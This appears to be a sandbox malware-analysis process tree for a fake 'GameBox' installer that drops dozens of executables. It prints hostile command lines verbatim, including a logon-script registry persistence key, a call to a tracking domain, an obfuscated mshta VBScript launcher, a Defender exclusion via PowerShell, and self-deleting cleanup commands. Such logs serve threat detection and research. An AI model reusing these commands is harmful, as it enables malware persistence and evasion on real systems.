                                                                  "C:\Users\Admin\AppData\Local\Temp\is-TC6SE.tmp\MUI4VbGmUJUjK1hDYGVlIMLR.tmp" /SL5="$1029E,138429,56832,C:\Users\Admin\Documents\MUI4VbGmUJUjK1hDYGVlIMLR.exe"
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:4548
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-NTTBN.tmp\Setup.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-NTTBN.tmp\Setup.exe" /Verysilent
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in Program Files directory
                                                                    PID:3960
                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                      3⤵
                                                                        PID:4112
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-2HA2B.tmp\Inlog.tmp
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-2HA2B.tmp\Inlog.tmp" /SL5="$10338,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:5076
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-RN9P0.tmp\Setup.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-RN9P0.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                            5⤵
                                                                              PID:6784
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-21LFD.tmp\Setup.tmp
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-21LFD.tmp\Setup.tmp" /SL5="$2055A,17367683,721408,C:\Users\Admin\AppData\Local\Temp\is-RN9P0.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                6⤵
                                                                                • Loads dropped DLL
                                                                                • Drops file in Program Files directory
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                PID:3124
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-2PNQV.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                  7⤵
                                                                                    PID:7416
                                                                                    • C:\Windows\SysWOW64\expand.exe
                                                                                      expand C:\Users\Admin\AppData\Local\Temp\is-2PNQV.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in Windows directory
                                                                                      PID:4112
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                    7⤵
                                                                                      PID:5812
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                        8⤵
                                                                                          PID:9104
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                        7⤵
                                                                                        • Checks computer location settings
                                                                                        PID:6008
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-2PNQV.tmp\{app}\vdi_compiler.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-2PNQV.tmp\{app}\vdi_compiler"
                                                                                        7⤵
                                                                                          PID:4108
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-2PNQV.tmp\{app}\vdi_compiler.exe"
                                                                                            8⤵
                                                                                              PID:3816
                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                ping localhost -n 4
                                                                                                9⤵
                                                                                                • Runs ping.exe
                                                                                                PID:9572
                                                                                          • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                            "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                            7⤵
                                                                                              PID:4380
                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Enumerates connected drives
                                                                                      • Modifies system certificate store
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:4240
                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629472577 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                        4⤵
                                                                                          PID:4508
                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5192
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-5UQBK.tmp\MediaBurner2.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-5UQBK.tmp\MediaBurner2.tmp" /SL5="$103CA,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:5540
                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5340
                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                          4⤵
                                                                                            PID:4624
                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5420
                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmpA237_tmp.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\tmpA237_tmp.exe"
                                                                                            4⤵
                                                                                              PID:4040
                                                                                              • C:\Windows\SysWOW64\dllhost.exe
                                                                                                "C:\Windows\System32\dllhost.exe"
                                                                                                5⤵
                                                                                                  PID:7104
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                  5⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:3032
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd
                                                                                                    6⤵
                                                                                                      PID:1208
                                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                                        findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                        7⤵
                                                                                                          PID:8220
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                          Esplorarne.exe.com i
                                                                                                          7⤵
                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                          PID:8588
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                            8⤵
                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                            PID:6188
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                              9⤵
                                                                                                              • Drops startup file
                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                              PID:3152
                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                          ping RJMQBVDN -n 30
                                                                                                          7⤵
                                                                                                          • Runs ping.exe
                                                                                                          PID:8600
                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks computer location settings
                                                                                                  PID:5528
                                                                                                  • C:\Users\Admin\Documents\Y1wDLPXo0FkwT_GiApKGWYL5.exe
                                                                                                    "C:\Users\Admin\Documents\Y1wDLPXo0FkwT_GiApKGWYL5.exe"
                                                                                                    4⤵
                                                                                                      PID:6324
                                                                                                      • C:\Users\Admin\Documents\Y1wDLPXo0FkwT_GiApKGWYL5.exe
                                                                                                        "C:\Users\Admin\Documents\Y1wDLPXo0FkwT_GiApKGWYL5.exe"
                                                                                                        5⤵
                                                                                                          PID:5344
                                                                                                      • C:\Users\Admin\Documents\bRJCgrGhIUZuZjTvcCOu9orT.exe
                                                                                                        "C:\Users\Admin\Documents\bRJCgrGhIUZuZjTvcCOu9orT.exe"
                                                                                                        4⤵
                                                                                                        • Drops file in Program Files directory
                                                                                                        PID:6396
                                                                                                      • C:\Users\Admin\Documents\irAc494Ryf9oZuP8nK8hwpMG.exe
                                                                                                        "C:\Users\Admin\Documents\irAc494Ryf9oZuP8nK8hwpMG.exe"
                                                                                                        4⤵
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:6644
                                                                                                      • C:\Users\Admin\Documents\TBmU4wbjV4tf4NdjI5YXO0Km.exe
                                                                                                        "C:\Users\Admin\Documents\TBmU4wbjV4tf4NdjI5YXO0Km.exe"
                                                                                                        4⤵
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:6772
                                                                                                        • C:\Users\Admin\Documents\TBmU4wbjV4tf4NdjI5YXO0Km.exe
                                                                                                          C:\Users\Admin\Documents\TBmU4wbjV4tf4NdjI5YXO0Km.exe
                                                                                                          5⤵
                                                                                                            PID:7436
                                                                                                        • C:\Users\Admin\Documents\lmQWlTmywMHlPDsWx3NJOHXF.exe
                                                                                                          "C:\Users\Admin\Documents\lmQWlTmywMHlPDsWx3NJOHXF.exe"
                                                                                                          4⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Checks processor information in registry
                                                                                                          PID:6636
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im lmQWlTmywMHlPDsWx3NJOHXF.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\lmQWlTmywMHlPDsWx3NJOHXF.exe" & del C:\ProgramData\*.dll & exit
                                                                                                            5⤵
                                                                                                              PID:4708
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /im lmQWlTmywMHlPDsWx3NJOHXF.exe /f
                                                                                                                6⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:5312
                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                timeout /t 6
                                                                                                                6⤵
                                                                                                                • Delays execution with timeout.exe
                                                                                                                PID:5040
                                                                                                          • C:\Users\Admin\Documents\t4lutPDi2pi7VwSEu9RNKX8h.exe
                                                                                                            "C:\Users\Admin\Documents\t4lutPDi2pi7VwSEu9RNKX8h.exe"
                                                                                                            4⤵
                                                                                                              PID:6628
                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\t4lutPDi2pi7VwSEu9RNKX8h.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\t4lutPDi2pi7VwSEu9RNKX8h.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                5⤵
                                                                                                                  PID:5072
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\t4lutPDi2pi7VwSEu9RNKX8h.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\t4lutPDi2pi7VwSEu9RNKX8h.exe" ) do taskkill -f -iM "%~NxA"
                                                                                                                    6⤵
                                                                                                                      PID:7792
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill -f -iM "t4lutPDi2pi7VwSEu9RNKX8h.exe"
                                                                                                                        7⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Kills process with taskkill
                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                        PID:5276
                                                                                                                • C:\Users\Admin\Documents\HreP8hLRadW3kVoUwZhzlK4C.exe
                                                                                                                  "C:\Users\Admin\Documents\HreP8hLRadW3kVoUwZhzlK4C.exe"
                                                                                                                  4⤵
                                                                                                                    PID:6388
                                                                                                                  • C:\Users\Admin\Documents\J7muxRgqghvP3ScvTDcDijB4.exe
                                                                                                                    "C:\Users\Admin\Documents\J7muxRgqghvP3ScvTDcDijB4.exe"
                                                                                                                    4⤵
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:6380
                                                                                                                  • C:\Users\Admin\Documents\rwGO7uJ1kSzeNZ426oumYWoj.exe
                                                                                                                    "C:\Users\Admin\Documents\rwGO7uJ1kSzeNZ426oumYWoj.exe"
                                                                                                                    4⤵
                                                                                                                      PID:6372
                                                                                                                    • C:\Users\Admin\Documents\45FEpjD936VSSeUP_OtcJTV3.exe
                                                                                                                      "C:\Users\Admin\Documents\45FEpjD936VSSeUP_OtcJTV3.exe"
                                                                                                                      4⤵
                                                                                                                        PID:6360
                                                                                                                      • C:\Users\Admin\Documents\meapNeBtYBZL7hnOg41qKKKF.exe
                                                                                                                        "C:\Users\Admin\Documents\meapNeBtYBZL7hnOg41qKKKF.exe"
                                                                                                                        4⤵
                                                                                                                          PID:6352
                                                                                                                        • C:\Users\Admin\Documents\7ihpON8Amv3230DF3udZWa0m.exe
                                                                                                                          "C:\Users\Admin\Documents\7ihpON8Amv3230DF3udZWa0m.exe"
                                                                                                                          4⤵
                                                                                                                            PID:6344
                                                                                                                          • C:\Users\Admin\Documents\cxxhkkex4TmOWbJdFDAevdyg.exe
                                                                                                                            "C:\Users\Admin\Documents\cxxhkkex4TmOWbJdFDAevdyg.exe"
                                                                                                                            4⤵
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Checks whether UAC is enabled
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            PID:6312
                                                                                                                          • C:\Users\Admin\Documents\OLI8U57KV01a1a0zLAEIHWQs.exe
                                                                                                                            "C:\Users\Admin\Documents\OLI8U57KV01a1a0zLAEIHWQs.exe"
                                                                                                                            4⤵
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:6304
                                                                                                                            • C:\Users\Admin\Documents\OLI8U57KV01a1a0zLAEIHWQs.exe
                                                                                                                              "C:\Users\Admin\Documents\OLI8U57KV01a1a0zLAEIHWQs.exe"
                                                                                                                              5⤵
                                                                                                                                PID:8884
                                                                                                                            • C:\Users\Admin\Documents\RfswEa5uqsf4zzO1cUOSGTEx.exe
                                                                                                                              "C:\Users\Admin\Documents\RfswEa5uqsf4zzO1cUOSGTEx.exe"
                                                                                                                              4⤵
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Checks whether UAC is enabled
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              PID:6336
                                                                                                                            • C:\Users\Admin\Documents\QB9aaCR2Zvp2mPkHjqi6aRch.exe
                                                                                                                              "C:\Users\Admin\Documents\QB9aaCR2Zvp2mPkHjqi6aRch.exe"
                                                                                                                              4⤵
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Checks processor information in registry
                                                                                                                              PID:6444
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im QB9aaCR2Zvp2mPkHjqi6aRch.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\QB9aaCR2Zvp2mPkHjqi6aRch.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                5⤵
                                                                                                                                  PID:2456
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    taskkill /im QB9aaCR2Zvp2mPkHjqi6aRch.exe /f
                                                                                                                                    6⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:8576
                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                    timeout /t 6
                                                                                                                                    6⤵
                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                    PID:3940
                                                                                                                              • C:\Users\Admin\Documents\cfNCAgdOjoAjVd1vjWRhbVRv.exe
                                                                                                                                "C:\Users\Admin\Documents\cfNCAgdOjoAjVd1vjWRhbVRv.exe"
                                                                                                                                4⤵
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:348
                                                                                                                                • C:\Users\Admin\Documents\cfNCAgdOjoAjVd1vjWRhbVRv.exe
                                                                                                                                  "C:\Users\Admin\Documents\cfNCAgdOjoAjVd1vjWRhbVRv.exe"
                                                                                                                                  5⤵
                                                                                                                                    PID:8948
                                                                                                                                  • C:\Users\Admin\Documents\cfNCAgdOjoAjVd1vjWRhbVRv.exe
                                                                                                                                    "C:\Users\Admin\Documents\cfNCAgdOjoAjVd1vjWRhbVRv.exe"
                                                                                                                                    5⤵
                                                                                                                                      PID:9020
                                                                                                                                  • C:\Users\Admin\Documents\BVc2tXwQp_mfXCzn0kL_6z3P.exe
                                                                                                                                    "C:\Users\Admin\Documents\BVc2tXwQp_mfXCzn0kL_6z3P.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:4164
                                                                                                                                    • C:\Users\Admin\Documents\BVc2tXwQp_mfXCzn0kL_6z3P.exe
                                                                                                                                      C:\Users\Admin\Documents\BVc2tXwQp_mfXCzn0kL_6z3P.exe
                                                                                                                                      5⤵
                                                                                                                                        PID:7308
                                                                                                                                      • C:\Users\Admin\Documents\BVc2tXwQp_mfXCzn0kL_6z3P.exe
                                                                                                                                        C:\Users\Admin\Documents\BVc2tXwQp_mfXCzn0kL_6z3P.exe
                                                                                                                                        5⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:7820
                                                                                                                                    • C:\Users\Admin\Documents\rV1p7PmctPIgUQdcfobUTp6Y.exe
                                                                                                                                      "C:\Users\Admin\Documents\rV1p7PmctPIgUQdcfobUTp6Y.exe"
                                                                                                                                      4⤵
                                                                                                                                        PID:3032
                                                                                                                                        • C:\Users\Admin\Documents\rV1p7PmctPIgUQdcfobUTp6Y.exe
                                                                                                                                          C:\Users\Admin\Documents\rV1p7PmctPIgUQdcfobUTp6Y.exe
                                                                                                                                          5⤵
                                                                                                                                            PID:4876
                                                                                                                                        • C:\Users\Admin\Documents\ZOlcicbsEYxjfCC4oGqIGd91.exe
                                                                                                                                          "C:\Users\Admin\Documents\ZOlcicbsEYxjfCC4oGqIGd91.exe"
                                                                                                                                          4⤵
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          PID:2008
                                                                                                                                          • C:\Users\Admin\Documents\ZOlcicbsEYxjfCC4oGqIGd91.exe
                                                                                                                                            "C:\Users\Admin\Documents\ZOlcicbsEYxjfCC4oGqIGd91.exe"
                                                                                                                                            5⤵
                                                                                                                                              PID:8228
                                                                                                                                          • C:\Users\Admin\Documents\YcTk0PRfIn5oW5wPT7PxU9VV.exe
                                                                                                                                            "C:\Users\Admin\Documents\YcTk0PRfIn5oW5wPT7PxU9VV.exe"
                                                                                                                                            4⤵
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            PID:7132
                                                                                                                                          • C:\Users\Admin\Documents\mJwPS5yUtGIcdeIK0BR7LagG.exe
                                                                                                                                            "C:\Users\Admin\Documents\mJwPS5yUtGIcdeIK0BR7LagG.exe"
                                                                                                                                            4⤵
                                                                                                                                              PID:6448
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\1997557.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\1997557.exe"
                                                                                                                                                5⤵
                                                                                                                                                  PID:6820
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3280104.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\3280104.exe"
                                                                                                                                                  5⤵
                                                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                                                  PID:3984
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3698814.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\3698814.exe"
                                                                                                                                                  5⤵
                                                                                                                                                    PID:8164
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1413279.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\1413279.exe"
                                                                                                                                                    5⤵
                                                                                                                                                      PID:8256
                                                                                                                                                  • C:\Users\Admin\Documents\Ey800MpsKm5TL_XckfZpUPLE.exe
                                                                                                                                                    "C:\Users\Admin\Documents\Ey800MpsKm5TL_XckfZpUPLE.exe"
                                                                                                                                                    4⤵
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    PID:7500
                                                                                                                                                    • C:\Users\Admin\Documents\Ey800MpsKm5TL_XckfZpUPLE.exe
                                                                                                                                                      "C:\Users\Admin\Documents\Ey800MpsKm5TL_XckfZpUPLE.exe"
                                                                                                                                                      5⤵
                                                                                                                                                        PID:7772
                                                                                                                                                    • C:\Users\Admin\Documents\u_6vGbjaMk2f6amYa82Oz8qG.exe
                                                                                                                                                      "C:\Users\Admin\Documents\u_6vGbjaMk2f6amYa82Oz8qG.exe"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:7492
                                                                                                                                                      • C:\Users\Admin\Documents\7GSpak7obd4SOJ3o9ATCkqli.exe
                                                                                                                                                        "C:\Users\Admin\Documents\7GSpak7obd4SOJ3o9ATCkqli.exe"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:7484
                                                                                                                                                        • C:\Users\Admin\Documents\d4tFLRpH8ruWQLYyIv7H4guo.exe
                                                                                                                                                          "C:\Users\Admin\Documents\d4tFLRpH8ruWQLYyIv7H4guo.exe"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:7832
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-62DJN.tmp\d4tFLRpH8ruWQLYyIv7H4guo.tmp
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-62DJN.tmp\d4tFLRpH8ruWQLYyIv7H4guo.tmp" /SL5="$2062A,138429,56832,C:\Users\Admin\Documents\d4tFLRpH8ruWQLYyIv7H4guo.exe"
                                                                                                                                                              5⤵
                                                                                                                                                                PID:8024
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-CN865.tmp\Setup.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-CN865.tmp\Setup.exe" /Verysilent
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  PID:6552
                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                    PID:6224
                                                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629472577 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:6724
                                                                                                                                                              • C:\Users\Admin\Documents\EO3nid5csvKb0LAmP2R7wXlj.exe
                                                                                                                                                                "C:\Users\Admin\Documents\EO3nid5csvKb0LAmP2R7wXlj.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:7988
                                                                                                                                                                  • C:\Users\Admin\Documents\EO3nid5csvKb0LAmP2R7wXlj.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\EO3nid5csvKb0LAmP2R7wXlj.exe" -q
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:6532
                                                                                                                                                                  • C:\Users\Admin\Documents\zNnHwbh3CHgunWJLz_7ayMRT.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\zNnHwbh3CHgunWJLz_7ayMRT.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:7252
                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\ZNNHWB~1.DLL,s C:\Users\Admin\DOCUME~1\ZNNHWB~1.EXE
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:7616
                                                                                                                                                                          • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                            C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\ZNNHWB~1.DLL,NQYv
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                                            PID:7884
                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\ZNNHWB~1.DLL
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:10064
                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:5256
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\4845452.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\4845452.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:7028
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\5735704.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\5735704.exe"
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                            PID:6888
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\6066841.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\6066841.exe"
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:6836
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\2114790.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\2114790.exe"
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:6980
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4566520.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4566520.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:7052
                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:1716
